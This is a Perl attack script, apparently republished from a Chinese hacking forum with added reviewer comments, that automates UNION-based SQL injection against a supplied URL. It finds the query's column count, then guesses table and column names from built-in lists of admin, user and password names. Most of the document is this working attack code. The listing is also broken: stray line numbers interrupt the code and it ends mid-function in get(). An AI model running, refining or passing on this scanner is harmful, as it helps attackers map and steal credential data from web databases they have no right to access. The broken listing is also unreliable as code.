字段和表段扫描perl版 (table/column name scanner for UNION-based SQL injection, Perl version)
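#!/usr/bin/perl
# Table/column name scanner for UNION-based SQL injection (MySQL-style
# "/**/" comment probes).
# by Xiaojie - thanks to all my friends.
# 578757691#163.com
# http://hi.baidu.com/hnnsg
# usage: perl perl.pl http://www...
#
# This script sends injected SQL ("... union select ...") to the given URL.
# Use it only against systems you are explicitly authorized to test.
#
# Fixes to the listing as published: the "#!" line sat on line 4, where it is
# an ordinary comment - it must be the first line to take effect; and the
# module line read "use I:Socket;", which is not a valid module name.  The
# socket-based get() at the end of the file presumably wants IO::Socket.
# TODO(review): the script relies on undeclared package globals throughout;
# "use strict" can only be added once they are declared.
use IO::Socket;

# Success marker: a probe counts as "query executed" when the response still
# contains this text.  It is a per-target value - "TOM" is almost certainly
# not right for your target; change it before running.
$keywords = "TOM";

# Optional extra dictionaries, one name per line, merged into the built-in
# lists below.  Both files must exist (the loader dies otherwise).
$Dict_Table = "Dict_Table.txt";
$Dict_Field = "Dict_Field.txt";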
# Built-in table-name dictionary for the table scan.  Names are probed in this
# order; the optional $Dict_Table file is appended to the list later.
# (admin_user is listed twice, exactly as in the original.)
@tabledic = qw(
    name pwd jobs links users username usernames mysql.user member members
    admin administrator administrators login logins logon userrights superuser
    control usercontrol author autore artikel newsletter tb_user tb_users
    tb_username tb_usernames tb_admin tb_administrator tb_member tb_members
    tb_login perdorues korisnici webadmin webadmins webuser webusers webmaster
    webmasters customer customers sysuser sysusers sysadmin sysadmins
    memberlist tbluser tbl_user tbl_users a_admin x_admin m_admin adminuser
    admin_user adm userinfo user_info admin_userinfo userlist user_list
    user_admin user_login admin_user admin_login login_user login_users
    login_admin login_admins sitelogin site_login sitelogins site_logins
    SiteLogin Site_Login User Users Admin Admins Login Logins adminrights news
    table tables perdoruesit
);
# Built-in column-name dictionary for the field scan.  Names are probed in
# this order; the optional $Dict_Field file is appended to the list later.
# (Several names repeat - name, user_pass, admin_user, admin_pass, userid,
# admin_id, adminid, myusername - exactly as in the original.)
@fielddic = qw(
    admin name jobname user username password passwd pass email emri
    fjalekalimi pwd user_name user_password name id user_pass admin_user
    admin_password user_pass admin_pass usern user_n users login logins
    login_user login_admin login_username user_username user_login auid apwd
    adminid admin_id adminuser admin_user adminuserid admin_userid
    adminusername admin_username adminname admin_name usr usr_n usrname
    usr_name usrpass usr_pass usrnam nc uid userid user_id myusername mail
    emni logohu punonjes kpro_user wp_users emniplote perdoruesi perdorimi
    punetoret logini llogaria fjalekalimin kodi emer ime korisnik korisnici
    user1 administrator administrator_name mem_login login_password
    login_pass login_passwd login_pwd sifra lozinka psw pass1word pass_word
    passw pass_w user_passwd userpass userpassword userpwd user_pwd useradmin
    user_admin mypassword passwrd admin_pwd admin_pass admin_passwd
    mem_password memlogin userid admin_id adminid e_mail usrn u_name uname
    mempassword mem_pass mem_passwd mem_pwd p_word pword p_assword myusername
    myname my_username my_name my_password my_email
);
64.
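# --- Target URL -------------------------------------------------------------
# Taken from the first command-line argument, or prompted for when there is
# none.  A bare host/path gets "http://" prepended.
if (!@ARGV) {
    print "please insert the url:";
    chomp($url = <STDIN>);
}
else {
    # Bug fix: the listing used @ARGV[0], a one-element slice; it yields the
    # same value but is a warning-level mistake.  $ARGV[0] is the element.
    $url = $ARGV[0];
}

# The listing shows "/http:///" - its backslashes were lost on the way to the
# page and the regex is unparseable.  The intended test is for an "http://"
# prefix; it is anchored here so a URL that merely contains "http://" in its
# query string still gets the scheme added.
if ($url !~ m{\Ahttp://}) {
    $url = "http://" . $url;
}

# Splits the URL into host ($1) and path ($2).  Nothing in the visible code
# reads these captures, but get() lies outside this listing - confirm it does
# not rely on them before removing this match.
$url =~ m{http://(.*?)/(.*)};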
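# --- Step 1: find the column count of the injectable SELECT ---------------
# Probe "... and 1=1 union select 1,2,...,N/*" for N = 1..$max_columns.  The
# first N whose response still contains $keywords (the query ran without
# error) is taken as the column count.  The successful probe string is left in
# $one on purpose: the table scan below builds its queries by appending to it.
my $max_columns = 50;
my $lengh;                      # column count; name kept - the field scan uses it

foreach my $len (1 .. $max_columns) {
    $one = $url
         . "/**/and/**/1=1/**/union/**/select/**/"
         . join(',', 1 .. $len)
         . "/*";

    # The listing hard-coded the Windows "cls", which just prints an error
    # from the shell on other systems.
    system($^O eq 'MSWin32' ? 'cls' : 'clear');
    print "[+]scan field length... \n";
    print "$one\n";

    $data = get("$one");
    # \Q..\E matches the marker literally even if it contains regex
    # metacharacters (the marker is operator-configured, not fixed text).
    if ($data =~ /\Q$keywords\E/) {
        $lengh = $len;
        print "[-]field length is : $len\n";
        last;
    }
}

# The listing carried on with an undefined $lengh when nothing matched, and the
# later scans then sent malformed probes.  Stop here instead.
die "[!]could not determine the column count (tried 1..$max_columns)\n"
    unless defined $lengh;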
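print "[+]start scan table... \n";

# Extend the built-in dictionaries with the optional text files (one name per
# line).  gettextlist() dies if a file cannot be opened.
@tabledic = (@tabledic, gettextlist($Dict_Table));

# Bug fix: the listing wrote "@fielddic = (@tabledic, @flist)", which threw
# away the built-in column names and probed table names as columns instead.
@fielddic = (@fielddic, gettextlist($Dict_Field));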
112.
113.
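# --- Step 2: guess table names ---------------------------------------------
# $one is the column-count probe and ends in "/*"; appending "*/from/**/NAME/*"
# turns it into "... select 1,..,N/**/from/**/NAME/*".  A name is kept when the
# response still shows $keywords, i.e. the query did not error out.
my @table;
foreach my $table (@tabledic) {
    my $two = $one . "*/from/**/$table/*";
    $data = get("$two");
    # \Q..\E: match the marker literally, whatever characters it contains.
    push @table, $table if $data =~ /\Q$keywords\E/;
}

# Summary of everything that matched.
foreach my $found (@table) {
    print "[-] $found\n";
}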
134.
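print "[+]start scan field... \n";

# Which table to scan, and which column position of the union to replace with
# each candidate column name.  (The listing's prompt said "field length",
# which is not what the value is used for.)
print "[+]please enter the table you want to scan:";
chomp($tableone = <STDIN>);
print "[+]please enter the column position to put the field name in (1..$lengh):";
chomp($fieldindex = <STDIN>);

# Defaults when the operator just presses Enter.
if (!$tableone) {
    $tableone = "mysql.user";
    print " table is unset,value is set $tableone\n";
}

if (!$fieldindex) {
    $fieldindex = "4";
    print " the fieldindex is unset,value is set $fieldindex\n";
}

# The field scan substitutes the candidate name for column $fieldindex.  If the
# index is not a whole number within 1..$lengh, no substitution ever happens,
# every probe is the plain column query, and every candidate is reported as
# found.  Refuse such input rather than print false positives.
die "[!]field index must be a whole number between 1 and $lengh\n"
    unless $fieldindex =~ /\A\d+\z/ && $fieldindex >= 1 && $fieldindex <= $lengh;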
150.
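# --- Step 3: guess column names in $tableone -------------------------------
# For each candidate, rebuild the union probe with the candidate in place of
# column $fieldindex: "... select 1,..,NAME,..,N/**/from/**/TABLE/*".
# Assumes 1 <= $fieldindex <= $lengh: outside that range no substitution
# happens and every candidate would be reported as found.
my @field;
foreach my $field (@fielddic) {
    # Bug fix: the listing appended a comma after the substituted name even
    # when it was the last column, producing "select 1,2,NAME,/**/from" -
    # an SQL syntax error whenever $fieldindex == $lengh, so that position
    # could never find anything.
    my @columns = map { $_ == $fieldindex ? $field : $_ } 1 .. $lengh;
    my $three = $url
              . "/**/and/**/1=1/**/union/**/select/**/"
              . join(',', @columns)
              . "/**/from/**/$tableone/*";

    $data = get("$three");
    # \Q..\E: match the marker literally, whatever characters it contains.
    if ($data =~ /\Q$keywords\E/) {
        print "[-] $field\n";
        push @field, $field;
    }
}

# Summary of everything that matched (each was also printed as it was found).
foreach my $found (@field) {
    print "[-] $found\n";
}

print "------end------\n";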
188.
189.
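# Read a dictionary file and return its entries as a list.
#
# Arguments: $textname - path of a text file with one entry per line.
# Returns:   the entries in file order, line endings (LF or CRLF) removed.
#            Blank lines are skipped - they would become empty probe names.
# Dies if the file cannot be opened; the callers rely on that.
#
# The listing declared this with an empty "()" prototype while passing one
# argument; it only worked because the sub is defined after its call sites.
sub gettextlist
{
    my ($textname) = @_;
    my @textlist = ();

    # Three-argument open with a lexical handle: with the two-argument form a
    # name beginning with ">" or "|" would change the open mode.
    open my $fh, '<', $textname or die "Cant open $textname: $!";
    while (my $line = <$fh>) {
        chomp $line;
        $line =~ s/\r\z//;          # tolerate CRLF dictionary files
        next if $line eq '';
        push @textlist, $line;
    }
    close $fh;

    return @textlist;
}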
204.
205.
206.
# thanks to Google
# Timeout handler for the fetch in get() (presumably installed as the alarm
# handler there): it closes the pending socket.  $sock is the connection
# handle owned by get(), which lies outside this listing.  The original "die"
# is left disabled, so a timeout merely ends the transfer and the caller gets
# whatever partial response was read - confirm get() copes with that.
sub timeout()
{
    return close($sock);
    # die "timeout";   # kept disabled, as in the original
}
213.
214. sub get()
215. {
216. l